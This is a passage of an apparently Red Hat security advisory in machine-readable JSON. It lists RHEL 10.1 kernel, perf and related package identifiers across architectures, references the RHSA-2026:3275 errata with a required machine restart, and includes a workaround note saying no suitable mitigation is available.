"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64"
],
"restart_required": {
"category": "machine"
},
"url": "https://access.redhat.com/errata/RHSA-2026:3275"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
